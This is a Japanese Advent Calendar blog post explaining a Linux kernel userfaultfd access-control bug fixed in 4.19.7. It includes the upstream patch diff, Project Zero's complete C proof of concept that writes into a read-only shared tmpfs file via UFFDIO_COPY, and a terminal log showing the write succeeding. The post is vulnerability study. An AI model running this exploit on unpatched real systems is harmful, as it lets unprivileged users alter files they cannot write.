概要

Linux kernel 4.19.7より前のuserfaultfdにはアクセス制御のバグがある.

userfaultfdについてはこちら

影響

ioctlでUFFDIO_COPYしたりする時,対象のメモリ空間に対する権限を確認していなかった.

project-zeroによる解説がわかりやすいのでここから先はこのページじゃ無くてそっちを読め.

patch

この辺

patchを読めば問題点もわかる.

まとめてびゃ〜ってした奴↓

diff --git a/fs/userfaultfd.c b/fs/userfaultfd.c
index 356d2b8568c1..cd58939dc977 100644
--- a/fs/userfaultfd.c
+++ b/fs/userfaultfd.c
@@ -1361,6 +1361,19 @@ static int userfaultfd_register(struct userfaultfd_ctx *ctx,
                ret = -EINVAL;
                if (!vma_can_userfault(cur))
                        goto out_unlock;
+
+               /*
+                * UFFDIO_COPY will fill file holes even without
+                * PROT_WRITE. This check enforces that if this is a
+                * MAP_SHARED, the process has write permission to the backing
+                * file. If VM_MAYWRITE is set it also enforces that on a
+                * MAP_SHARED vma: there is no F_WRITE_SEAL and no further
+                * F_WRITE_SEAL can be taken until the vma is destroyed.
+                */
+               ret = -EPERM;
+               if (unlikely(!(cur->vm_flags & VM_MAYWRITE)))
+                       goto out_unlock;
+
                /*
                 * If this vma contains ending address, and huge pages
                 * check alignment.
@@ -1406,6 +1419,7 @@ static int userfaultfd_register(struct userfaultfd_ctx *ctx,
                BUG_ON(!vma_can_userfault(vma));
                BUG_ON(vma->vm_userfaultfd_ctx.ctx &&
                       vma->vm_userfaultfd_ctx.ctx != ctx);
+               WARN_ON(!(vma->vm_flags & VM_MAYWRITE));

                /*
                 * Nothing to do: this vma is already registered into this
@@ -1552,6 +1566,7 @@ static int userfaultfd_unregister(struct userfaultfd_ctx *ctx,
                cond_resched();

                BUG_ON(!vma_can_userfault(vma));
+               WARN_ON(!(vma->vm_flags & VM_MAYWRITE));

                /*
                 * Nothing to do: this vma is already registered into this
diff --git a/mm/hugetlb.c b/mm/hugetlb.c
index 7f2a28ab46d5..705a3e9cc910 100644
--- a/mm/hugetlb.c
+++ b/mm/hugetlb.c
@@ -4080,7 +4080,7 @@ int hugetlb_mcopy_atomic_pte(struct mm_struct *dst_mm,

                /* fallback to copy_from_user outside mmap_sem */
                if (unlikely(ret)) {
-                       ret = -EFAULT;
+                       ret = -ENOENT;
                        *pagep = page;
                        /* don't free the page */
                        goto out;
diff --git a/mm/shmem.c b/mm/shmem.c
index 42b70978e814..6c54a6874e41 100644
--- a/mm/shmem.c
+++ b/mm/shmem.c
@@ -2238,7 +2238,7 @@ static int shmem_mfill_atomic_pte(struct mm_struct *dst_mm,
                                *pagep = page;
                                shmem_inode_unacct_blocks(inode, 1);
                                /* don't free the page */
-                               return -EFAULT;
+                               return -ENOENT;
                        }
                } else {                /* mfill_zeropage_atomic */
                        clear_highpage(page);
diff --git a/mm/userfaultfd.c b/mm/userfaultfd.c
index 5029f241908f..43cf314cfddd 100644
--- a/mm/userfaultfd.c
+++ b/mm/userfaultfd.c
@@ -48,7 +48,7 @@ static int mcopy_atomic_pte(struct mm_struct *dst_mm,

                /* fallback to copy_from_user outside mmap_sem */
                if (unlikely(ret)) {
-                       ret = -EFAULT;
+                       ret = -ENOENT;
                        *pagep = page;
                        /* don't free the page */
                        goto out;
@@ -205,8 +205,9 @@ static __always_inline ssize_t __mcopy_atomic_hugetlb(struct mm_struct *dst_mm,
                if (!dst_vma || !is_vm_hugetlb_page(dst_vma))
                        goto out_unlock;
                /*
-                * Only allow __mcopy_atomic_hugetlb on userfaultfd
-                * registered ranges.
+                * Check the vma is registered in uffd, this is
+                * required to enforce the VM_MAYWRITE check done at
+                * uffd registration time.
                 */
                if (!dst_vma->vm_userfaultfd_ctx.ctx)
                        goto out_unlock;
@@ -274,7 +275,7 @@ static __always_inline ssize_t __mcopy_atomic_hugetlb(struct mm_struct *dst_mm,

                cond_resched();

-               if (unlikely(err == -EFAULT)) {
+               if (unlikely(err == -ENOENT)) {
                        up_read(&dst_mm->mmap_sem);
                        BUG_ON(!page);

@@ -380,7 +381,17 @@ static __always_inline ssize_t mfill_atomic_pte(struct mm_struct *dst_mm,
 {
        ssize_t err;

-       if (vma_is_anonymous(dst_vma)) {
+       /*
+        * The normal page fault path for a shmem will invoke the
+        * fault, fill the hole in the file and COW it right away. The
+        * result generates plain anonymous memory. So when we are
+        * asked to fill an hole in a MAP_PRIVATE shmem mapping, we'll
+        * generate anonymous memory directly without actually filling
+        * the hole. For the MAP_PRIVATE case the robustness check
+        * only happens in the pagetable (to verify it's still none)
+        * and not in the radix tree.
+        */
+       if (!(dst_vma->vm_flags & VM_SHARED)) {
                if (!zeropage)
                        err = mcopy_atomic_pte(dst_mm, dst_pmd, dst_vma,
                                               dst_addr, src_addr, page);
@@ -449,13 +460,9 @@ static __always_inline ssize_t __mcopy_atomic(struct mm_struct *dst_mm,
        if (!dst_vma)
                goto out_unlock;
        /*
-        * Be strict and only allow __mcopy_atomic on userfaultfd
-        * registered ranges to prevent userland errors going
-        * unnoticed. As far as the VM consistency is concerned, it
-        * would be perfectly safe to remove this check, but there's
-        * no useful usage for __mcopy_atomic ouside of userfaultfd
-        * registered ranges. This is after all why these are ioctls
-        * belonging to the userfaultfd and not syscalls.
+        * Check the vma is registered in uffd, this is required to
+        * enforce the VM_MAYWRITE check done at uffd registration
+        * time.
         */
        if (!dst_vma->vm_userfaultfd_ctx.ctx)
                goto out_unlock;
@@ -489,7 +496,8 @@ static __always_inline ssize_t __mcopy_atomic(struct mm_struct *dst_mm,
         * dst_vma.
         */
        err = -ENOMEM;
-       if (vma_is_anonymous(dst_vma) && unlikely(anon_vma_prepare(dst_vma)))
+       if (!(dst_vma->vm_flags & VM_SHARED) &&
+           unlikely(anon_vma_prepare(dst_vma)))
                goto out_unlock;

        while (src_addr < src_start + len) {
@@ -530,7 +538,7 @@ static __always_inline ssize_t __mcopy_atomic(struct mm_struct *dst_mm,
                                       src_addr, &page, zeropage);
                cond_resched();

-               if (unlikely(err == -EFAULT)) {
+               if (unlikely(err == -ENOENT)) {
                        void *page_kaddr;

userfaultfd.c

in userfaultfd_register

追加されたコードの重要なところ

ret = -EPERM;
if (unlikely(!(cur->vm_flags & VM_MAYWRITE)))
    goto out_unlock;

unlikelyについてはなんか前記事で書いた気がするので省略する.嘘.記事には書いてなかったわ

何をしているかは自明で,cur(型はstruct vm_area_struct *)のvm_flagsにVM_MAYWRITEが立っていない(書き込み可能にできないマッピングである)場合,-EPERMを返す.

PoC

project-zeroがPoCも公開している

#define _GNU_SOURCE
#include <fcntl.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/syscall.h>
#include <linux/userfaultfd.h>
#include <err.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <stdio.h>

/* userfaultfd file descriptor used for the API/REGISTER/COPY ioctls. */
static int uffd;
/* Read-only shared mapping of the target file. */
static void *uf_mapping;

/*
 * Proof of concept: fill a page of /dev/shm/uffd_test through UFFDIO_COPY
 * even though the file can only be opened read-only by the caller.
 *
 * Steps:
 *   1. confirm that opening the file O_RDWR fails (otherwise abort),
 *   2. open it O_RDONLY and map one page PROT_READ / MAP_SHARED,
 *   3. register the mapping with a userfaultfd in MISSING mode,
 *   4. UFFDIO_COPY a buffer starting with "AAAA" into the mapping,
 *   5. print the first 32-bit word read back through the mapping.
 *
 * Returns 0 on success; every failure terminates via err()/errx() with
 * exit status 1.
 */
int main(int argc, char **argv) {
        /* Length of the mapping and of the copied buffer. */
        enum { MAP_LEN = 0x1000 };
        static const char target_path[] = "/dev/shm/uffd_test";

        (void)argc;
        (void)argv;

        /* The demo is only meaningful if we lack write access to the file. */
        int rw_open_res = open(target_path, O_RDWR);
        if (rw_open_res == -1)
                perror("can't open for writing as expected");
        else
                errx(1, "unexpected write open success");

        int mfd = open(target_path, O_RDONLY);
        if (mfd == -1) err(1, "tmpfs open");
        uf_mapping = mmap(NULL, MAP_LEN, PROT_READ, MAP_SHARED, mfd, 0);
        if (uf_mapping == MAP_FAILED) err(1, "mmap");

        // Documentation for userfaultfd:
        // http://man7.org/linux/man-pages/man2/userfaultfd.2.html
        // http://man7.org/linux/man-pages/man2/ioctl_userfaultfd.2.html
        // https://blog.lizzie.io/using-userfaultfd.html
        uffd = syscall(__NR_userfaultfd, 0);
        if (uffd == -1) err(1, "userfaultfd");
        /* API handshake; no optional features are requested. */
        struct uffdio_api api = { .api = UFFD_API, .features = 0 };
        if (ioctl(uffd, UFFDIO_API, &api)) err(1, "API");

        struct uffdio_register reg = {
                .range = {
                        .start = (unsigned long)uf_mapping,
                        .len = MAP_LEN
                },
                .mode = UFFDIO_REGISTER_MODE_MISSING
        };
        if (ioctl(uffd, UFFDIO_REGISTER, &reg)) err(1, "REGISTER");

        /* Source page: "AAAA" followed by zeroes. */
        char buf[MAP_LEN] = {'A', 'A', 'A', 'A'};
        struct uffdio_copy copy = {
                .dst = (unsigned long)uf_mapping,
                .src = (unsigned long)buf,
                .len = MAP_LEN,
                .mode = 0
        };
        if (ioctl(uffd, UFFDIO_COPY, &copy)) err(1, "copy");
        /* copy.copy is filled in by the ioctl; require a full-page copy. */
        if (copy.copy != MAP_LEN) errx(1, "copy len");

        printf("x: 0x%08x\n", *(unsigned int*)uf_mapping);
        return 0;
}

再現手順

root@ubuntu-bionic:~# cd /dev/shm/
root@ubuntu-bionic:/dev/shm# umask 0022
root@ubuntu-bionic:/dev/shm# touch uffd_test
root@ubuntu-bionic:/dev/shm# truncate --size=4096 uffd_test
root@ubuntu-bionic:/dev/shm# exit
vagrant@ubuntu-bionic:~/uffd$ ls
uffd_demo  uffd_demo.c
vagrant@ubuntu-bionic:~/uffd$ cat uffd_demo.c
#define _GNU_SOURCE
#include <fcntl.h>
~~ snip ~~
vagrant@ubuntu-bionic:~/uffd$ ./uffd_demo
can't open for writing as expected: Permission denied
x: 0x41414141
vagrant@ubuntu-bionic:~/uffd$ sudo su
root@ubuntu-bionic:/home/vagrant/uffd# cat /dev/shm/uffd_test
AAAAroot@ubuntu-bionic:/home/vagrant/uffd#
root@ubuntu-bionic:/home/vagrant/uffd# hexdump -C /dev/shm/uffd_test
00000000  41 41 41 41 00 00 00 00  00 00 00 00 00 00 00 00  |AAAA............|
00000010  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
*
00001000

あとがき

project-zeroはやっぱり凄いね^^

この記事はIPFactory Advent Calendar 2020の7日目の分とします.

IPFactoryについてはこちら

誰も書いてなさそうだったので桜Trickを見ながら急いで書きました.

昨日はfanotify-rs(セキュリティキャンプ全国大会2020Z-V: まとめ)でした.

明日はkumusanによるwebworker内でwasmを使用しようとして失敗した(WebGL)です.